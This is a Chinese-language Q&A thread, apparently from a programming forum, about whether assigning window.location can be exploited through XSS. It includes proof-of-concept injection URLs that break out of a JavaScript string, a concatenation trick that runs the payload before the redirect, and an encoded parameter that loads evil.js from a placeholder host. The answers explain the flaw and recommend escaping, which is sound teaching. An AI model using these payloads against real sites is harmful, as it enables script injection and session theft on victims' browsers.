window.location = window.location容易受到XSS攻击吗？

如果我正确理解您的问题，那么这些答案都是不正确的。可以利用 window.location 进行xss攻击。似乎您遇到的障碍是当执行了 window.location 后，页面会刷新并跳过执行 yourpayload 的操作。我假设您可以在 window.location 的右侧字符串中引入内容，并且输入未被正确编码为 JavaScript 字符串。
例如，如果 http://vulnerablewebsite/page?param=derp';alert('xss');var+a+%3d+' 会生成以下代码：

<script>
  window.location='derp';alert('xss');var a = '';
</script>

你可以利用字符串连接将window.location的赋值推迟到有效负载执行后。代码示例如下： http://vulnerablewebsite/page?param=derp'+%2B+alert('xss')+%2b+' 这样会生成以下代码，从而执行你的有效负载。

<script>
  window.location='derp' + alert('xss') + '';
</script>

这个问题应该在安全 StackExchange 上讨论。

问题与 window.location 无关，而与您处理在新上下文中使用的任意数据有关。
如果您从 URL 获取输入并使用它来构建一个新的重定向 URL，那么您会遇到问题。考虑经典的重定向页面...

http://example.com/redirect?url=http%3A%2F%2Fsomethingevil

如果页面上有JavaScript，然后将window.location设置为查询字符串参数url的值，那么页面将跳转到http://somethingevil。

XSS主要是通过允许查询字符串参数向页面本身注入数据来实现的。例如，您可能有一个页面显示“Hello Brad”，其中“Brad”来自名为name的URL参数。现在，假设攻击者代替将URL设置为name=%3Cscript%20src%3D%22http%3A%2F%2Fexample.com%2Fevil.js%22%3E%3C%2Fscript%3E。如果我直接将name的值注入到页面中，则我的脚本evil.js将在该页面上运行。如果我适当地转义数据，那么它可以作为文本在页面中使用。